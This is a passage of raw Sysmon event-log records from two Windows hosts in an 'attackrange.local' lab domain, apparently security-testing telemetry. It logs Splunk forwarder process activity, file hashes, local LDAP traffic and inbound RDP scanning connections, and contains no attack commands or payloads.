Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050086Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.848{85C0FFC9-EBB6-607E-E206-00000000BB01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000073310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:55.906{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=CB4BE7D3392DA00F00E4B30293892F21,SHA256=1BCB8975D257B5AE5791554FA50505EE3F0C5CC133AAD72AD9DE70F3E6961E4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:54.146{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57525-false10.0.1.12-8000- 354300x800000000000000073308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:53.891{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57426-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:55.656{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:55.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:55.234{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90EBD91330644E4CABB7146525356DD2,SHA256=D2FF092E4859EB4A7DCA7603DB92BEAEBCE9092AA82F1DC0C29F67504A7EE906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050117Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.926{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06344D7A8D38A2CD31E1B8F644D9B674,SHA256=494C6C3E341511D9D88E3407386ED62561A135882911F1DC1624C8B685F44DCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050116Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.629{85C0FFC9-EBB7-607E-E306-00000000BB01}34882984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050115Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBB7-607E-E306-00000000BB01}3488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050114Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050113Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050112Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050111Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050110Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050109Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050108Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050107Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050106Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050105Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EBB7-607E-E306-00000000BB01}3488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050104Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.519{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBB7-607E-E306-00000000BB01}3488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050103Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.520{85C0FFC9-EBB7-607E-E306-00000000BB01}3488C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050102Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:55.301{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E271B47507210A5C86F9E16BAE6D27B,SHA256=10541DDC83ED691D7EC01E049C0CC900DC0FA8EBB0335F8A8C8B1819DA950B74,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050101Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:53.445{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58563-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050100Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:53.003{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61154-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000073319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:56.953{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=50C2A6CD31EB89C6055253D0F71CADE2,SHA256=CF3C412D4FD6EC0E4C90748F2B55ED759E254D9EF26C65FC74804F4A71DBD18D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:56.843{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:55.324{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58790-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000073316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:54.693{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57526-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000073315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:54.693{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57526-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000073314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:54.570{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com59927-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:56.593{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=96C99AB9FA95113A967FD723B9A1FE67,SHA256=E77FB2A19D1909F55456D9FEAFBB292E7F8A7315FFF82F5B631682420E0A392B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:56.437{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:56.265{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44405D52377BB80EBD74FA05BB392735,SHA256=0F199C38984E41AB8F19DADD9A94E9E76249798AD2DB2F45D41A9561D1ECEFFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050133Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.941{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83BFEB72F539E85CCBC9E2725B90405E,SHA256=CF912C8C24811B871C2728E8D6C4078A7A697A09C5CBCFE550719CA979763CDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050132Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.676{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=211A6D826C0EDBFC47682E2A8364B424,SHA256=A45336EE93E8DE7B0ED26FB040B2A55D3C953D79009F37297F4B42BEE5FC370A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050131Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:54.087{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51169-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000050130Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.191{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBB8-607E-E406-00000000BB01}364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050129Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 